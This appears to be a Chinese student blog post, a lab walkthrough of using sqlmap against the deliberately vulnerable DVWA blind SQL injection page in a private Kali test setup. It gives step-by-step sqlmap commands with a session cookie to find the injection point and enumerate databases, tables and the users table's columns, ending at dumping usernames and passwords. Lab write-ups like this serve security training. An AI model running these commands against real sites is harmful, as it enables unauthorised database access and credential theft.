利用SQLmap实现 SQL 注入

已于 2023-06-30 01:01:27 修改
阅读量818 收藏 7
点赞数
文章标签: sql
于 2023-06-29 23:25:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70934757/article/details/131466124
版权

SQLmap

SQLmap简介

SQLMAP是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL和SQL注入漏洞,其广泛的功能和选项包括数据库指纹,枚举,数据库提权,访问目标文件系统,并在获取操作权限时执行任意命令。

SQLMAP是开源的自动化SQL注入工具,由Python写成,具有如下特点:

  1. 完全支持MySQL、Oracle、PostgreSQL、MSSQL、Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。
  2. 完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。
  3. 在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。
  4. 支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列
  5. 支持自动识别密码哈希格式并通过字典破解密码哈希。
  6. 支持完全地下载某个数据库中的某个表、也可以只下载某个表中的某几列。
  7. 支持在数据库管理系统中搜索指定的数据库名、表名和列名
  8. 当数据库管理系统是MySQL、PostgreSQL或者MSSQL时支持下载或上传文件。
  9. 当数据库管理系统是MySQL、PostgreSQL或者MSSQL时支持执行任意命令并回显标准输出。

SQL 注入简介

SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。大家也许都听过某某学长通过攻击学校数据库修改自己成绩的事情,这些学长们一般用的就是SQL注入方法。

SQL注入其实就是恶意用户通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码的过程。简单来说,就是数据「越俎代庖」做了代码才能干的事情。

这个问题的来源是,SQL数据库的操作是通过SQL语句来执行的,而无论是执行代码还是数据项都必须写在SQL语句之中,这就导致如果我们在数据项中加入了某些SQL语句关键字(比如说SELECT、DROP等等),这些关键字就很可能在数据库写入或读取数据时得到执行。

利用SQLmap实现 SQL 注入

环境准备

  1. 开启OWASP靶机和Kali虚拟机
  2. kali中登陆dvwa(用户名和密码都是 admin),进入 SQL Injection(Blind)页面,安全等级调为low

在这里插入图片描述

利用SQLmap实现 SQL 注入案例

1.输入数字后提交

随意输入一个数字,如将ID输入为:1,然后单击“提交”。在浏览器地址栏复制URL

在这里插入图片描述

2.使用开发者工具为后续工作做准备

F12打开开发者工具,选中Storage(存储)选项卡,找到cookies,复制其中的PHPSESSID的值(获取cookies,为之后绕过登录页面做准备)

在这里插入图片描述

3.输入命令来实现绕过登录页面

由于浏览器提交方式为get型,sqlmap采用-u命令。将刚才复制的URL和COOKIE写入命令:

sqlmap -u “http://192.168.11.131/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=iavdr5g5koni1thuqk78ldji17” --batch

(使用sqlmap进行get型注入,cookie用来绕过登录页面)
复制cookie值后,排成如下格式:
security=low;PHPSESSID=glp39jv1sjcs2gbem1pu105hu2

在这里插入图片描述

可以获取到注入点:

在这里插入图片描述

4.为了查看有哪些数据库

输入命令:

sqlmap -u “http://192.168.11.131/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=iavdr5g5koni1thuqk78ldji17” --batch --dbs

在这里插入图片描述

5.为了查看有当前数据库

输入命令:
sqlmap -u “http://192.168.11.131/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=iavdr5g5koni1thuqk78ldji17” --batch --current-db

在这里插入图片描述

6.为了查看数据库中所有的表

输入命令:
sqlmap -u “http://192.168.11.131/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=iavdr5g5koni1thuqk78ldji17” --batch -D dvwa --tables
在这里插入图片描述

7.为了查看users表中有哪些列

输入命令:
sqlmap -u “http://192.168.11.131/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=iavdr5g5koni1thuqk78ldji17” --batch -D dvwa -T users --columns
在这里插入图片描述

8.爆破表中user和password这两列

在这里插入图片描述

21计算机网络技术2班陆利丽
关注
利用sqlmap进行sql自动化注入攻击
shatianyzg的博客
05-31 412
sqlmap自动化注入攻击
在kali linux里利用SQLmap实现SQL注入
2201_76034619的博客
06-28 6004
安全等级调为low进入SQL Injection(Blind)页面。
利用sqlmap实现基本的SQL注入
weixin_33897722的博客
04-13 97
注入基本上可分为以下三种:1.get类:sqlmap -u "http://xxx?x=xx"2.post类:sqlmap -r "xxx.txt"3.cookie类:sqlmap -u "http://xxx?x=xx" –cookie="x=xx&y=yy" --level=2一 get类1,枚举数据库:sqlmap -u "http://xxx?x=xx"...
WEB应用(十)---SQL注入
最新发布
2302_78820467的博客
07-30 905
web学习第十篇
sqlmap进行SQL注入
weixin_45095113的博客
03-16 574
sqlmapSQL注入
sqlmap工具的实操--sql注入
weixin_66839513的博客
04-01 2840
sql注入原理就是将恶意的sql语句通过表单或者url拼接到web后端的查询语句中,绕过后端的认证,在后端被服务器执行恶意的sql语句,获取到数据库的权限,从而对数据库进行执行操作,造成数据的篡改及泄露。
sqlmap sql 注入测试工具
03-06
SQLMap是一款强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
sqlmap-sql注入工具
07-06
它的主要功能是检测、利用和管理系统中的SQL注入漏洞,以实现数据窃取、数据库控制甚至服务器接管。这款工具在网络安全研究、渗透测试和漏洞评估领域中广泛应用。 1. **SQL注入原理**: SQL注入是一种常见的网络...
SQLmap-SQL注入
03-12
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问...
sqlmapsql注入(二)
m0_55313512的博客
02-27 2696
SQL注入(二)
sqlmap的安装及利用sqlmap进行SQL注入
Marsper的博客
09-10 479
一、sqlmap的安装 由于SQLMap利用Python语言写的,文章只记录安排sqlmap的安装过程,还未安装Python这个语言环境的同学,点击这里!!! sqlmap的下载 下载地址: https://www.cnblogs.com/lvtaohome/p/11121377.html 点击下载蓝色的zip file 安装过程 将下载的SQLMAP安装包解压到文件夹sqlmap中,并拷贝到自己的python目录下,例如图下 “D:\python3.8\sqlmap” 然后打开cmd命令提示符的文件
利用sqlmap进行需要登录的注入
qq_52358808的博客
09-01 2026
需要登录的注入1.利用bp获取cookie2.利用sqlmap获取用户名密码 1.利用bp获取cookie 2.利用sqlmap获取用户名密码 cookie注入命令:sqlmap.py -u 注入点 --cookie=”获取的cookie” sqlmap.py -u http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit --cookie=“security=low; PHPSESSID=9djnnv81n3lmgmu4sno9
SQL注入sqlmap入门教程
m0_56634355的博客
04-09 9173
sqlmapsql注入必备的也是最常用的工具,是每一位白帽子在的利器之一。
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3094
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
sqlmapsql注入原理利用
m0_55313512的博客
02-26 2409
SqlMap
利用Sqlmap进行SQL注入攻击
m0_62689523的博客
08-14 1828
sqlmap简介 sqlmap是一款基于python编写的渗透测试工具,在sql检测和利用方面功能强大,支持多种数据库。 功能:sqlmap是一个自动化SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。.........
4.羽翼sqlmap学习笔记之Post登录框注入
weixin_33778544的博客
11-28 165
4.Sqlmap系列教程——post登录框注入注入点: http://xxx.xxx.com/Login.asp 注入方式一:     1.对着注入使用burp抓包,保存txt格式文件。     2.输入命令: ./sqlmap.py -r search-test.txt -p tfUPass 注入方式二:自动搜索表单的方式    sqlmap -u http:/...
web安全SQLmap自动化注入
干铮的博客
05-08 754
sqlmap自动化注入 SQL注入比较好用的工具,首推开源工具SQLmap.SQLmap是一个国内外著名的安全稳定性测试工具,可以用 来进行自动化监测,利用SQL注入漏洞,获取数据库服务器的权限,它具有功能强大的监测引擎,针对各种不同 类型数据库的安全稳定性能测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外 带数据连接的方式执行操作系统命令。 SQLmap支持M...
使用SQLmap检测SQL注入:DVWA实战教程
SQLmap是一款开源的SQL注入漏洞探测和利用工具,它支持多种数据库管理系统,并且能够自动执行一系列任务,如数据库指纹识别、数据提取、文件系统访问以及服务器命令执行。这使得安全研究人员和渗透测试人员能够高效...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

21计算机网络技术2班陆利丽

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值